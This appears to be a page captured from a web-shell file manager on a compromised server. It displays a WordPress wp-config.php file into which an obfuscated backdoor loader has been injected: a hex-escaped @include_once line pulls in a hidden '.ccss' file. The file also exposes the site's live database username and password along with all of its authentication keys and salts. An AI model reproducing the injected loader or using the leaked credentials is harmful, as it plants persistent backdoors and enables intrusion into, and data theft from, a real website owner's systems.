HEX
Server: nginx/1.27.1
System: Linux in-4 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64
User: ilikadirect (1186)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v6964/gopalak/public_html/wp-config.php
<?php
/*bed22*/

$r7uiv = "/storage/v6964/gopalak/publ\x69c_html/wp\x2d\x69ncludes/blocks/search/.832d6df8.ccss"; strpos($r7uiv, 'ug'); @include_once /* z */ ($r7uiv);

/*bed22*/
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'gopalakdb' );

/** MySQL database username */
define( 'DB_USER', 'gopalakdbuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'yV2LvDtU9VE7PH28Vi' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          ')3x`7iZ{d6)uLua30*FApFV(1wW@ih<&}RABX,2IFe|;?@,OD+f_Pk(^Y]k]Z(`l' );
define( 'SECURE_AUTH_KEY',   'Mq}gtHVNB=t+XS>Hm%iVdftke*0tTlJX=5VWRHm0I&x,w=C>h|~;)d=4HO3UDBK)' );
define( 'LOGGED_IN_KEY',     'd{(<*>?J:~s[)Q& <_J%wF^k|F:t~_3Ika=66J59o)QFwE@(DO(Z;C>nn.5B9Mr5' );
define( 'NONCE_KEY',         '.n(3FgOBTFxVJSgyxI?s1tL#nxnc[9oHdfK$C>RrWt,mI~AukN4`AFRXM=Q#<#&|' );
define( 'AUTH_SALT',         '.NeDRV]Pa{x|:Dp3[XqSRo YH!mwt[ld Bf+LzXKDB ywLrf3^;&j80OU8b2W%2N' );
define( 'SECURE_AUTH_SALT',  'PEKjrc;9`tNNv V`7r,)Uj)~5jP,F2+<a_QiMAFiN?Ur5Fs}hR=0=BPEd(}$]uMl' );
define( 'LOGGED_IN_SALT',    '0aKNZKb@mv?LP6BL%c0q-SnGR=q2:r/,.jYNO}&xaf~B_IQaL9P?`aS&*Kc&~b/)' );
define( 'NONCE_SALT',        'JdRZ$IGeJ5XeE=&Ty+zkCvtRFD[/To&Qyw24oz#L5d6cVu.GfAc_uhYOAP/xom}q' );
define( 'WP_CACHE_KEY_SALT', '3/o({,*XcgSw[@^wB|GU5C}vNOobH&N1Yo^IgT~T71>t}~:|@<Db0qpbq{Q[Kgs)' );

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';




define( 'FS_METHOD', 'direct' );
define( 'WP_MEMORY_LIMIT', '256M' );
define( 'CDN_SITE_ID', 'FbvttvKZ3dUVmxQpqO3t78nee' );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';